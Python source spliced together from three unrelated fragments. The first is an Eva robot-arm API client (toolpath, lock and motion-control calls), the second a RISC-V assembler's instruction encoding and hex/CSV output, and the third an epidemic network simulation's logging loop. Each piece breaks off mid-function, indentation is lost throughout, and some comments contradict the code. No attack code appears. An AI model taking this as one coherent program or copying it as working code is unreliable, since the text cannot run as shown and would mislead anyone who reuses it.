return self.data_snapshot_property('global.{}s'.format(pin_type))[pin]
# GPIO helper function
def __globals_editing(self, keys, values, mode='flat'):
data = {'changes': []}
if (isinstance(keys, list) and isinstance(values, list)):
[data['changes'].append({'key': c[0], 'value': c[1]}) for c in zip(keys, values)]
else:
data['changes'].append({'key': keys, 'value': values})
data = json.dumps(data)
r = self.api_call_with_auth('POST', 'data/globals?mode=' + mode, data)
return r
# TOOLPATHS
def toolpaths_list(self):
r = self.api_call_with_auth('GET', 'toolpaths')
if r.status_code != 200:
eva_error('toolpaths_list error', r)
return r.json()['toolpaths']
def toolpaths_retrieve(self, ID):
r = self.api_call_with_auth('GET', 'toolpaths/{}'.format(ID))
if r.status_code != 200:
eva_error('toolpaths_retrieve error for ID {}'.format(ID), r)
return r.json()['toolpath']
def toolpaths_save(self, name, toolpathRepr):
toolpaths = self.toolpaths_list()
toolpathId = None
for toolpath in toolpaths:
if toolpath['name'] == name:
toolpathId = toolpath['id']
break
toolpath = json.dumps({'name': name, 'toolpath': toolpathRepr})
if toolpathId is None:
action = 'save'
r = self.api_call_with_auth('POST', 'toolpaths', toolpath)
else:
action = 'update'
r = self.api_call_with_auth('PUT', 'toolpaths/{}'.format(toolpathId), toolpath)
if r.status_code != 200:
eva_error('toolpaths_save {} error'.format(action), r)
else:
if action == 'save':
toolpathId = r.json()['toolpath']['id']
return toolpathId
def toolpaths_use_saved(self, toolpathId):
r = self.api_call_with_auth('POST', 'toolpaths/{}/use'.format(toolpathId))
if r.status_code != 200:
eva_error('toolpaths_use_saved error', r)
def toolpaths_use(self, toolpathRepr):
r = self.api_call_with_auth('POST', 'toolpath/use', json.dumps({'toolpath': toolpathRepr}))
if r.status_code != 200:
eva_error('toolpaths_use error', r)
def toolpaths_delete(self, toolpathId):
r = self.api_call_with_auth('DELETE', 'toolpaths/{}'.format(toolpathId))
if r.status_code != 200:
eva_error('toolpaths_delete error', r)
# LOCK
def lock_status(self):
r = self.api_call_with_auth('GET', 'controls/lock')
if r.status_code != 200:
eva_error('lock_status error', r)
return r.json()
def lock_lock(self):
r = self.api_call_with_auth('POST', 'controls/lock')
if r.status_code != 200:
eva_error('lock_lock error', r)
def lock_renew(self):
r = self.api_call_with_auth('PUT', 'controls/lock')
if r.status_code != 200:
eva_error('lock_renew error', r)
def lock_unlock(self):
r = self.api_call_with_auth('DELETE', 'controls/lock')
if r.status_code != 200:
eva_error('lock_unlock error', r)
def lock_wait_for(self, interval_sec=2, timeout=None):
if self.lock_status()['owner'] == 'you':
return
if timeout is not None:
timeoutT = time.time() + timeout
while True:
try:
self.lock_lock()
return
except Exception as e:
if not isinstance(e, EvaError):
raise e
pass
if timeout is not None:
if timeoutT < time.time():
eva_error('lock_wait_for timeout triggered')
time.sleep(interval_sec)
# CONTROLS/STATE
def control_wait_for(self, goal, interval_sec=1):
    """Poll Eva's state until it reaches *goal*; error out on ERROR state."""
    target = RobotState(goal)
    while True:
        current = RobotState(self.data_snapshot()['control.state'])
        if current == RobotState.ERROR:
            eva_error('Eva is in error control state')
        elif current == target:
            return
        time.sleep(interval_sec)
def control_wait_for_ready(self):
    """Poll Eva's state until it reaches the "Ready" state."""
    self.control_wait_for(RobotState.READY)
def control_home(self, wait_for_ready=True):
r = self.api_call_with_auth('POST', 'controls/home')
if r.status_code != 200:
eva_error('control_home error', r)
elif wait_for_ready:
time.sleep(0.1) # sleep for small period to avoid race condition between updating cache and reading state
self.control_wait_for(RobotState.READY)
def control_run(self, loop=1, wait_for_ready=True, mode='teach'):
r = self.api_call_with_auth('POST', 'controls/run', json.dumps({'mode': mode, 'loop': loop}))
if r.status_code != 200:
eva_error('control_run error', r)
elif wait_for_ready:
time.sleep(0.1) # sleep for small period to avoid race condition between updating cache and reading state
self.control_wait_for(RobotState.READY)
def control_go_to(self, joints, wait_for_ready=True, velocity=None, duration=None, mode='teach'):
body = {'joints': joints, 'mode': mode}
if velocity is not None:
body['velocity'] = velocity
elif duration is not None:
body['time'] = duration
r = self.api_call_with_auth('POST', 'controls/go_to', json.dumps(body))
if r.status_code != 200:
eva_error('control_go_to error', r)
elif wait_for_ready:
time.sleep(0.1) # sleep for small period to avoid race condition between updating cache and reading state
self.control_wait_for(RobotState.READY)
def control_pause(self, wait_for_paused=True):
r = self.api_call_with_auth('POST', 'controls/pause')
if r.status_code != 200:
eva_error('control_pause error', r)
elif wait_for_paused:
time.sleep(0.1) # sleep for small period to avoid race condition between updating cache and reading state
self.control_wait_for(RobotState.PAUSED)
def control_resume(self, wait_for_ready=True):
r = self.api_call_with_auth('POST', 'controls/resume')
if r.status_code != 200:
eva_error('control_resume error', r)
elif wait_for_ready:
time.sleep(0.1) # sleep for small period to avoid race condition between updating cache and reading state
self.control_wait_for(RobotState.READY)
def control_cancel(self, wait_for_ready=True):
r = self.api_call_with_auth('POST', 'controls/cancel')
if r.status_code != 200:
eva_error('control_cancel error', r)
elif wait_for_ready:
time.sleep(0.1) # sleep for small period to avoid race condition between updating cache and reading state
self.control_wait_for(RobotState.READY)
def control_stop_loop(self, wait_for_ready=True):
r = self.api_call_with_auth('POST', 'controls/stop_loop')
if r.status_code != 200:
eva_error('control_stop_loop error', r)
elif wait_for_ready:
time.sleep(0.1) # sleep for small period to avoid race condition between updating cache and reading state
self.control_wait_for(RobotState.READY)
def control_reset_errors(self, wait_for_ready=True):
r = self.api_call_with_auth('POST', 'controls/reset_errors')
if r.status_code != 204:
eva_error('control_reset_errors error', r)
elif wait_for_ready:
time.sleep(0.1) # sleep for small period to avoid race condition between updating cache and reading state
self.control_wait_for(RobotState.READY)
# CALCULATIONS
def calc_forward_kinematics(self, joints, fk_type='both', tcp_config=None):
body = {'joints': joints}
if tcp_config is not None:
body['tcp_config'] = tcp_config
r = self.api_call_with_auth('PUT', 'calc/forward_kinematics', json.dumps(body))
if r.status_code != 200:
eva_error('calc_forward_kinematics error', r)
if (fk_type == 'position') or (fk_type == 'orientation'):
return r.json()['fk'][fk_type]
elif (fk_type == 'both'):
return r.json()['fk']
else:
eva_error('calc_forward_kinematics invalid fk_type {}'.format(fk_type), r)
def calc_inverse_kinematics(self, guess, target_position, target_orientation, tcp_config=None):
body = {'guess': guess, | |
= args[2]
instructionFields["rs1"] = args[1]
instructionFields["funct3"] = 5
instructionFields["rd"] = args[0]
instructionFields["opcode"] = 51
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.REM):
instructionFields = {}
instructionFields["type"] = "R"
instructionFields["funct7"] = 1
instructionFields["rs2"] = args[2]
instructionFields["rs1"] = args[1]
instructionFields["funct3"] = 6
instructionFields["rd"] = args[0]
instructionFields["opcode"] = 51
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.REMU):
instructionFields = {}
instructionFields["type"] = "R"
instructionFields["funct7"] = 1
instructionFields["rs2"] = args[2]
instructionFields["rs1"] = args[1]
instructionFields["funct3"] = 7
instructionFields["rd"] = args[0]
instructionFields["opcode"] = 51
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.SLTI):
instructionFields = {}
instructionFields["type"] = "I"
instructionFields["imm"] = args[2]
instructionFields["rs1"] = args[1]
instructionFields["funct3"] = 2
instructionFields["rd"] = args[0]
instructionFields["opcode"] = 19
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.SLTIU):
instructionFields = {}
instructionFields["type"] = "I"
instructionFields["imm"] = args[2]
instructionFields["rs1"] = args[1]
instructionFields["funct3"] = 3
instructionFields["rd"] = args[0]
instructionFields["opcode"] = 19
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.SLT):
instructionFields = {}
instructionFields["type"] = "R"
instructionFields["funct7"] = 0
instructionFields["rs2"] = args[2]
instructionFields["rs1"] = args[1]
instructionFields["funct3"] = 2
instructionFields["rd"] = args[0]
instructionFields["opcode"] = 51
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.SLTU):
instructionFields = {}
instructionFields["type"] = "R"
instructionFields["funct7"] = 0
instructionFields["rs2"] = args[2]
instructionFields["rs1"] = args[1]
instructionFields["funct3"] = 3
instructionFields["rd"] = args[0]
instructionFields["opcode"] = 51
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.AUIPC):
instructionFields = {}
instructionFields["type"] = "U"
instructionFields["rd"] = args[0]
instructionFields["imm"] = args[1]
instructionFields["opcode"] = 23
subInstructionFields.append(instructionFields)
#Control transfer instructions
elif (instructionEnum == INST.JAL):
instructionFields = {}
instructionFields["type"] = "J"
instructionFields["imm"] = args[0] - programCounter
instructionFields["rd"] = 1
instructionFields["opcode"] = 111
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.J):
instructionFields = {}
instructionFields["type"] = "J"
instructionFields["imm"] = args[0] - programCounter
instructionFields["rd"] = 0
instructionFields["opcode"] = 111
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.JR):
instructionFields = {}
instructionFields["type"] = "I"
instructionFields["imm"] = 0
instructionFields["rs1"] = args[0]
instructionFields["funct3"] = 0
instructionFields["rd"] = 0
instructionFields["opcode"] = 103
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.JALR):
instructionFields = {}
instructionFields["type"] = "I"
instructionFields["imm"] = 0
instructionFields["rs1"] = args[0]
instructionFields["funct3"] = 0
instructionFields["rd"] = args[1]
instructionFields["opcode"] = 103
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.BEQ):
instructionFields = {}
instructionFields["type"] = "B"
instructionFields["imm"] = args[2] - programCounter
instructionFields["rs2"] = args[1]
instructionFields["rs1"] = args[0]
instructionFields["funct3"] = 0
instructionFields["opcode"] = 99
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.BNE):
instructionFields = {}
instructionFields["type"] = "B"
instructionFields["imm"] = args[2] - programCounter
instructionFields["rs2"] = args[1]
instructionFields["rs1"] = args[0]
instructionFields["funct3"] = 1
instructionFields["opcode"] = 99
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.BLT):
instructionFields = {}
instructionFields["type"] = "B"
instructionFields["imm"] = args[2] - programCounter
instructionFields["rs2"] = args[1]
instructionFields["rs1"] = args[0]
instructionFields["funct3"] = 4
instructionFields["opcode"] = 99
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.BGE):
instructionFields = {}
instructionFields["type"] = "B"
instructionFields["imm"] = args[2] - programCounter
instructionFields["rs2"] = args[1]
instructionFields["rs1"] = args[0]
instructionFields["funct3"] = 5
instructionFields["opcode"] = 99
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.BLTU):
instructionFields = {}
instructionFields["type"] = "B"
instructionFields["imm"] = args[2] - programCounter
instructionFields["rs2"] = args[1]
instructionFields["rs1"] = args[0]
instructionFields["funct3"] = 6
instructionFields["opcode"] = 99
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.BGEU):
instructionFields = {}
instructionFields["type"] = "B"
instructionFields["imm"] = args[2] - programCounter
instructionFields["rs2"] = args[1]
instructionFields["rs1"] = args[0]
instructionFields["funct3"] = 7
instructionFields["opcode"] = 99
subInstructionFields.append(instructionFields)
#Load and store instructions
elif (instructionEnum == INST.LW):
instructionFields = {}
instructionFields["type"] = "I"
if (len(args) == 3):
instructionFields["imm"] = args[1]
instructionFields["rs1"] = args[2]
elif (len(args) == 2):
instructionFields["imm"] = args[1]
instructionFields["rs1"] = 0 #<TODO> fix this once we have AUIPC support
else:
raise Exception("Invalid number of args for \"lw\"")
instructionFields["funct3"] = 2
instructionFields["rd"] = args[0]
instructionFields["opcode"] = 3
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.LH):
instructionFields = {}
instructionFields["type"] = "I"
if (len(args) == 3):
instructionFields["imm"] = args[1]
instructionFields["rs1"] = args[2]
elif (len(args) == 2):
instructionFields["imm"] = args[1]
instructionFields["rs1"] = 0 #<TODO> fix this once we have AUIPC support
else:
raise Exception("Invalid number of args for \"lh\"")
instructionFields["funct3"] = 1
instructionFields["rd"] = args[0]
instructionFields["opcode"] = 3
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.LHU):
instructionFields = {}
instructionFields["type"] = "I"
if (len(args) == 3):
instructionFields["imm"] = args[1]
instructionFields["rs1"] = args[2]
elif (len(args) == 2):
instructionFields["imm"] = args[1]
instructionFields["rs1"] = 0 #<TODO> fix this once we have AUIPC support
else:
raise Exception("Invalid number of args for \"lhu\"")
instructionFields["funct3"] = 5
instructionFields["rd"] = args[0]
instructionFields["opcode"] = 3
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.LB):
instructionFields = {}
instructionFields["type"] = "I"
if (len(args) == 3):
instructionFields["imm"] = args[1]
instructionFields["rs1"] = args[2]
elif (len(args) == 2):
instructionFields["imm"] = args[1]
instructionFields["rs1"] = 0 #<TODO> fix this once we have AUIPC support
else:
raise Exception("Invalid number of args for \"lb\"")
instructionFields["funct3"] = 0
instructionFields["rd"] = args[0]
instructionFields["opcode"] = 3
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.LBU):
instructionFields = {}
instructionFields["type"] = "I"
if (len(args) == 3):
instructionFields["imm"] = args[1]
instructionFields["rs1"] = args[2]
elif (len(args) == 2):
instructionFields["imm"] = args[1]
instructionFields["rs1"] = 0 #<TODO> fix this once we have AUIPC support
else:
raise Exception("Invalid number of args for \"lbu\"")
instructionFields["funct3"] = 4
instructionFields["rd"] = args[0]
instructionFields["opcode"] = 3
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.SW):
instructionFields = {}
instructionFields["type"] = "S"
instructionFields["imm"] = args[1]
instructionFields["rs2"] = args[0]
instructionFields["rs1"] = args[2]
instructionFields["funct3"] = 2
instructionFields["opcode"] = 35
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.SH):
instructionFields = {}
instructionFields["type"] = "S"
instructionFields["imm"] = args[1]
instructionFields["rs2"] = args[0]
instructionFields["rs1"] = args[2]
instructionFields["funct3"] = 1
instructionFields["opcode"] = 35
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.SB):
instructionFields = {}
instructionFields["type"] = "S"
instructionFields["imm"] = args[1]
instructionFields["rs2"] = args[0]
instructionFields["rs1"] = args[2]
instructionFields["funct3"] = 0
instructionFields["opcode"] = 35
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.LUI):
instructionFields = {}
instructionFields["type"] = "U"
instructionFields["rd"] = args[0]
instructionFields["imm"] = args[1]
instructionFields["opcode"] = 55
subInstructionFields.append(instructionFields)
elif (instructionEnum == INST.LA):
#Pseudo instruction: la rd, SYMBOL = auipc rd, delta[31:12] + delta[11]; addi rd, rd, delta[11:0]
#Determine delta segments (see page 139 of riscv-spec.pdf)
delta = args[1] - programCounter
delta_31_12 = int(delta/4096)
delta_11 = int((delta-(delta_31_12*4096))/2048)
delta_11_0 = delta%4096
upperValue = delta_31_12 + delta_11
lowerValue = delta_11_0
#Generate instruction field dicts
auipcFields = {}
auipcFields["type"] = "U"
auipcFields["rd"] = args[0]
auipcFields["imm"] = upperValue
auipcFields["opcode"] = 23
subInstructionFields.append(auipcFields)
addiFields = {}
addiFields["type"] = "I"
addiFields["imm"] = lowerValue
addiFields["rs1"] = args[0]
addiFields["funct3"] = 0
addiFields["rd"] = args[0]
addiFields["opcode"] = 19
subInstructionFields.append(addiFields)
#########
# Concatenate instruction fields into binary strings
#########
for instructionFieldDict in subInstructionFields:
binaryString = ""
#R-type instructions
if (instructionFieldDict["type"] == "R"):
funct7_string = format(instructionFieldDict["funct7"], "07b") #7bit value
rs2_string = format(instructionFieldDict["rs2"], "05b") #5bit value
rs1_string = format(instructionFieldDict["rs1"], "05b") #5bit value
funct3_string = format(instructionFieldDict["funct3"], "03b") #3bit value
rd_string = format(instructionFieldDict["rd"], "05b") #5bit value
opcode_string = format(instructionFieldDict["opcode"], "07b") #7bit value
binaryString = "{}{}{}{}{}{}".format(funct7_string, rs2_string, rs1_string, funct3_string, rd_string, opcode_string)
#I-type instructions
elif (instructionFieldDict["type"] == "I"):
imm_string = ""
if (instructionFieldDict["imm"] < 0):
#handle negative immediate arguments
absVal = instructionFieldDict["imm"] * -1
absBinString = format(absVal, "012b") #get binary string of abs value
#Convert to 2's complement negative number
flippedBitsString = absBinString.replace("0","z").replace("1","0").replace("z","1") #Flip all bits
unsignedVal = int(flippedBitsString, 2)
twoCompInt = unsignedVal + 1
imm_string = format(twoCompInt, "012b")
else:
imm_string = format(instructionFieldDict["imm"], "012b") #12bit value
rs1_string = format(instructionFieldDict["rs1"], "05b") #5bit value
funct3_string = format(instructionFieldDict["funct3"], "03b") #3bit value
rd_string = format(instructionFieldDict["rd"], "05b") #5bit value
opcode_string = format(instructionFieldDict["opcode"], "07b") #7bit value
binaryString = "{}{}{}{}{}".format(imm_string, rs1_string, funct3_string, rd_string, opcode_string)
#J-type instructions
elif (instructionFieldDict["type"] == "J"):
imm_string = ""
if (instructionFieldDict["imm"] < 0):
#handle negative immediate arguments
absVal = instructionFieldDict["imm"] * -1
absBinString = format(absVal, "021b") #get binary string of abs value
#Convert to 2s compliment negative number
flippedBitsString = absBinString.replace("0","z").replace("1","0").replace("z","1") #Flip all bits
unsignedVal = int(flippedBitsString, 2)
twoCompInt = unsignedVal + 1
imm_string = format(twoCompInt, "021b")
else:
imm_string = format(instructionFieldDict["imm"], "021b") #12bit value
imm_stringReordered = "{}{}{}{}".format(imm_string[-21], imm_string[-11:-1], imm_string[-12], imm_string[-20:-12]) #Rearrange imm_stringOrdered to fit J-type bit index format [20|10:1|11|19:12]
rd_string = format(instructionFieldDict["rd"], "05b") #5bit value
opcode_string = format(instructionFieldDict["opcode"], "07b") #7bit value
binaryString = "{}{}{}".format(imm_stringReordered, rd_string, opcode_string)
#B-type instructions
elif (instructionFieldDict["type"] == "B"):
imm_string = ""
if (instructionFieldDict["imm"] < 0):
#handle negative immediate arguments
absVal = instructionFieldDict["imm"] * -1
absBinString = format(absVal, "013b") #get binary string of abs value
#Convert to 2s compliment negative number
flippedBitsString = absBinString.replace("0","z").replace("1","0").replace("z","1") #Flip all bits
unsignedVal = int(flippedBitsString, 2)
twoCompInt = unsignedVal + 1
imm_string = format(twoCompInt, "013b")
else:
imm_string = format(instructionFieldDict["imm"], "013b") #12bit value
#Split imm_string into required parts for B-type
immString_12 = imm_string[-13]
immString_10_5 = imm_string[-11:-5]
immString_4_1 = imm_string[-5:-1]
immString_11 = imm_string[-12]
rs2_string = format(instructionFieldDict["rs2"], "05b") #5bit value
rs1_string = format(instructionFieldDict["rs1"], "05b") #5bit value
funct3_string = format(instructionFieldDict["funct3"], "03b") #3bit value
opcode_string = format(instructionFieldDict["opcode"], "07b") #7bit value
binaryString = "{}{}{}{}{}{}{}{}".format(immString_12, immString_10_5, rs2_string, rs1_string, funct3_string, immString_4_1, immString_11, opcode_string)
#S-type instructions
elif (instructionFieldDict["type"] == "S"):
imm_string = ""
if (instructionFieldDict["imm"] < 0):
#handle negative immediate arguments
absVal = instructionFieldDict["imm"] * -1
absBinString = format(absVal, "013b") #get binary string of abs value
#Convert to 2s compliment negative number
flippedBitsString = absBinString.replace("0","z").replace("1","0").replace("z","1") #Flip all bits
unsignedVal = int(flippedBitsString, 2)
twoCompInt = unsignedVal + 1
imm_string = format(twoCompInt, "013b")
else:
imm_string = format(instructionFieldDict["imm"], "013b") #12bit value
#Split imm_string into required parts for S-type
immString_11_5 = imm_string[-12:-5]
immString_4_0 = imm_string[-5:]
rs2_string = format(instructionFieldDict["rs2"], "05b") #5bit value
rs1_string = format(instructionFieldDict["rs1"], "05b") #5bit value
funct3_string = format(instructionFieldDict["funct3"], "03b") #3bit value
opcode_string = format(instructionFieldDict["opcode"], "07b") #7bit value
binaryString = "{}{}{}{}{}{}".format(immString_11_5, rs2_string, rs1_string, funct3_string, immString_4_0, opcode_string)
#U-type instructions
elif (instructionFieldDict["type"] == "U"):
imm_string = ""
if (instructionFieldDict["imm"] < 0):
raise Exception("Negative immediate used in U type instruction | {}".format(instructionFieldDict["imm"]))
else:
imm_string = format(instructionFieldDict["imm"], "020b") #20bit value
rd_string = format(instructionFieldDict["rd"], "05b") #5bit value
opcode_string = format(instructionFieldDict["opcode"], "07b") #7bit value
binaryString = "{}{}{}".format(imm_string, rd_string, opcode_string)
else:
raise Exception("Unsupported instruction type {}".format(instruction))
#Convert binary instruction string to int and store in list
instructionValues.append(int(binaryString, 2))
#Iterate programCounter
programCounter += 4
except Exception as e:
errorMessage = ""
errorMessage += "PC = {}\n".format(programCounter)
errorMessage += "INST = {}\n\n".format(instruction)
errorMessage += traceback.format_exc()
printColor(errorMessage, color=COLORS.ERROR)
sys.exit()
return instructionValues
def writeLogisimHexFile(integerList, filepath):
    '''
    Write a list of integers into a Logisim hex file.

    The file starts with the "v2.0 raw" header that Logisim expects,
    followed by one unpadded lowercase hex value (no "0x" prefix) per line.

    integerList -- iterable of non-negative ints (instruction words)
    filepath    -- destination path; any existing file is overwritten
    '''
    # "with" guarantees the handle is closed even if a write raises,
    # unlike the previous explicit open()/close() pair.
    with open(filepath, "w") as outputFile:
        outputFile.write("v2.0 raw\n")
        for val in integerList:
            outputFile.write(hex(val)[2:])
            outputFile.write("\n")
def writeHexFile(integerList, filepath):
    '''
    Write a list of integers into a hex file.

    Each value is written as lowercase hex, zero-padded on the left to
    8 digits (32 bits), one value per line.

    integerList -- iterable of non-negative ints (instruction words)
    filepath    -- destination path; any existing file is overwritten
    '''
    # "with" guarantees the handle is closed even if a write raises,
    # unlike the previous explicit open()/close() pair.
    with open(filepath, "w") as outputFile:
        for val in integerList:
            outputFile.write(hex(val)[2:].zfill(8))
            outputFile.write("\n")
def generateCsvIndex(instructions, instructionIntValues, filepath):
    '''
    Generate a csv index for each instruction.

    Writes one row per instruction with its program counter (4 bytes per
    word), source representation, and decimal/hex/binary encodings, then
    returns the resulting DataFrame.

    instructions        -- sequence of instruction objects (str()-able)
    instructionIntValues -- encoded 32-bit value per instruction; may be
                            longer than instructions (zip stops at the
                            shorter, matching the original range(len())
                            behavior)
    filepath            -- destination csv path
    '''
    indexDict = {
        "ProgramCounter": [],
        "instruction": [],
        "DEC": [],
        "HEX": [],
        "BIN": []
    }
    # enumerate supplies the word index; zip pairs each instruction with
    # its encoded value (replaces manual range(len()) indexing and fixes
    # the "intructionStr" typo of the original).
    for address, (instruction, intValue) in enumerate(zip(instructions, instructionIntValues)):
        indexDict["ProgramCounter"].append(address * 4)
        indexDict["instruction"].append(str(instruction))
        indexDict["DEC"].append(intValue)
        indexDict["HEX"].append(hex(intValue))
        indexDict["BIN"].append(format(intValue, "032b"))
    df = pd.DataFrame(indexDict)
    df.to_csv(filepath, index=False)
    return df
def main(asmPath, hexPathArg, indexPath, logisim, debuggerAnnotations):
try:
#Convert asm file to machine code
instructions, linedInstructions, initializedData = parseAssemblyFile(asmPath)
programIntValues = instructionsToInts(instructions)
programIntValues.append(0)
programIntValues += [dataDef.value for dataDef in initializedData]
outputPath = asmPath.replace(".asm", "") + ".hex"
if (hexPathArg):
outputPath = hexPathArg
if (logisim):
outputPath = outputPath.replace(".hex", "_logisim.hex")
writeLogisimHexFile(programIntValues, outputPath)
else:
writeHexFile(programIntValues, outputPath)
if (indexPath):
generateCsvIndex(instructions, programIntValues, indexPath)
#Add assembly annotations to debuggerAnnotations dict
debuggerAnnotations["asmFileMap"] = {}
offset = 0 #keep track of offset for multi-inst pseudoinstructions
multiPseudoInstructions = [INST.LA]
for index in range(0, len(linedInstructions)):
#instruction tuple = [<lineNumber>, [<instruction_enum>,<arg1>,<arg2>,...]]
programCounter = (index+offset)*4
debuggerAnnotations["asmFileMap"][programCounter] = {}
debuggerAnnotations["asmFileMap"][programCounter]["lineNum"] = linedInstructions[index][0]
debuggerAnnotations["asmFileMap"][programCounter]["file"] = os.path.abspath(asmPath)
if (linedInstructions[index][1][0] in multiPseudoInstructions):
offset += 1
annotationFile = open("{}_annotation.json".format(asmPath.replace(".asm", "")), "w")
annotationFile.write(utils.dictToJson(debuggerAnnotations))
annotationFile.close()
#Print finished message
printColor("\nDone!", color=COLORS.OKGREEN)
print("{} total instructions".format(len(programIntValues)-1))
addressBits = math.log(len(programIntValues),2)
if (logisim and (addressBits > 24)):
printColor ("WARNING: Program | |
data structures and scenario flags:
self.update_parameters()
# Update the next checkpoint time:
checkpointIdx = numpy.searchsorted(checkpoints['t'],
self.t) # Finds 1st index in list greater than given val
if (checkpointIdx >= numCheckpoints):
# We are out of checkpoints, stop checking them:
checkpoints = None
else:
checkpointTime = checkpoints['t'][checkpointIdx]
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# print(f"t={self.t}, period ={self.period}")
if numpy.any(self.p_periodic) \
and (self.period > 0) \
and (int(self.t / self.period) > lastTestInterval):
if verbose:
print(f"periodic testing t={self.t}")
self.periodic_test(self.p_periodic)
lastTestInterval = int(self.t / self.period)
if self.has_policy and (not policyInterval or (int(self.t / policyInterval) > lastPolicyInterval)):
lastPolicyInterval = int(self.t / policyInterval)
if (verbose):
print(f"t={self.t}, Applying policy")
self.policy()
# self.update_parameters()
if self.numD_E[self.tidx] + self.numD_I[self.tidx]:
if not self.time_detected:
self.time_detected = self.tidx
if stopping == "1st":
if self.numD_I[self.tidx] + self.numD_E[self.tidx]:
self.finalize_data_series()
running = False
runTillEnd = False
elif stopping and stopping(self):
self.finalize_data_series()
running = False
runTillEnd = False
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if (print_interval):
if (print_reset and (int(self.t) % print_interval == 0)):
if (verbose == "t"):
print("t = %.2f" % self.t)
if (verbose == True):
print("t = %.2f" % self.t)
print("\t S = " + str(self.numS[self.tidx]))
print("\t E = " + str(self.numE[self.tidx]))
print("\t I = " + str(self.numI[self.tidx]))
print("\t D_E = " + str(self.numD_E[self.tidx]))
print("\t D_I = " + str(self.numD_I[self.tidx]))
print("\t R = " + str(self.numR[self.tidx]))
print("\t F = " + str(self.numF[self.tidx]))
print_reset = False
elif (not print_reset and (int(self.t) % 10 != 0)):
print_reset = True
# end of while loop
if not self.time_detected:
self.time_detected = self.tidx
if (verbose):
print(f"Finished execution at {self.t}")
print(
f"percentage of population tested / day: {100 * numpy.sum(self.numTested) / (self.numNodes * self.t):.3f}%")
totscale = 1
finscale = 1 # 100.0/(self.numNodes)
log = {}
for k, v in self.init_parameters.items():
if isinstance(v, dict):
for a, b in v.items():
log[f"{k}_{a}"] = b
else:
if isinstance(v, (list, numpy.ndarray)):
v = "list/array"
log[k] = v
temp = numpy.roll(self.tseries, 1)
temp[0] = 0
lengths = self.tseries - temp
log.update(
{"type": type,
"variant": variant,
"checkpoints": checkpoints,
"policy": self.has_policy,
"policy interval": policyInterval,
"stopping": stopping,
"t": self.t,
"totS": numpy.sum(self.numS * lengths),
"totE": numpy.sum(self.numE * lengths),
"totI": numpy.sum(self.numI * lengths),
"totD_E": numpy.sum(self.numD_E * lengths),
"totD_I": numpy.sum(self.numD_I * lengths),
"totE_tillFirst": numpy.sum(self.numE[:self.time_detected + 1] * lengths[:self.time_detected + 1]),
"totI_tillFirst": numpy.sum(self.numI[:self.time_detected + 1] * lengths[:self.time_detected + 1]),
"totR": numpy.sum(self.numR * lengths),
"tit": numpy.sum(self.numF * lengths),
"totTests": numpy.sum(self.numTested),
"totTests1st": numpy.sum(self.numTested[:self.time_detected + 1]),
"meanTests1st": numpy.sum(self.numTested[:self.time_detected + 1]) / self.tseries[
self.time_detected] if self.time_detected else 0,
"totPositive": numpy.sum(self.numPositive),
"finS": self.numS[self.tidx] * finscale,
"finE": self.numE[self.tidx] * finscale,
"finI": self.numI[self.tidx] * finscale,
"finD_E": self.numD_E[self.tidx] * finscale,
"finD_I": self.numD_I[self.tidx] * finscale,
"finR": self.numR[self.tidx] * finscale,
"finF": self.numF[self.tidx] * finscale,
"note": f"Finals scaled by {finscale:.5f}. Averages per time period",
"time1st": self.tseries[self.time_detected]
})
if (self.nodeGroupData):
for groupName in self.nodeGroupData:
log.update({
f"{groupName}_totS": numpy.sum(self.nodeGroupData[groupName]['numS'] * lengths),
f"{groupName}_totE": numpy.sum(self.nodeGroupData[groupName]['numE'] * lengths),
f"{groupName}_totI": numpy.sum(self.nodeGroupData[groupName]['numI'] * lengths),
f"{groupName}_totD_E": numpy.sum(self.nodeGroupData[groupName]['numD_E'] * lengths),
f"{groupName}_totD_I": numpy.sum(self.nodeGroupData[groupName]['numD_I'] * lengths),
f"{groupName}_totE_tillFirst": numpy.sum(
self.nodeGroupData[groupName]['numE'][:self.time_detected + 1] * lengths[
:self.time_detected + 1]),
f"{groupName}_totI_tillFirst": numpy.sum(
self.nodeGroupData[groupName]['numI'][:self.time_detected + 1] * lengths[
:self.time_detected + 1]),
f"{groupName}_totR": numpy.sum(self.nodeGroupData[groupName]['numR'] * lengths),
f"{groupName}_totTests": numpy.sum(self.nodeGroupData[groupName]['numTested']),
f"{groupName}_totTests1st": numpy.sum(
self.nodeGroupData[groupName]['numTested'][:self.time_detected + 1]),
f"{groupName}_meanTests1st": numpy.sum(
self.nodeGroupData[groupName]['numTested'][:self.time_detected + 1]) / self.tseries[
self.time_detected] if self.time_detected else 0,
f"{groupName}_finS": self.nodeGroupData[groupName]['numS'][self.tidx] * finscale,
f"{groupName}_finE": self.nodeGroupData[groupName]['numE'][self.tidx] * finscale,
f"{groupName}_finI": self.nodeGroupData[groupName]['numI'][self.tidx] * finscale,
f"{groupName}_finD_E": self.nodeGroupData[groupName]['numD_E'][self.tidx] * finscale,
f"{groupName}_finD_I": self.nodeGroupData[groupName]['numD_I'][self.tidx] * finscale,
f"{groupName}_finR": self.nodeGroupData[groupName]['numR'][self.tidx] * finscale,
f"{groupName}_finF": self.nodeGroupData[groupName]['numF'][self.tidx] * finscale,
})
log.update({
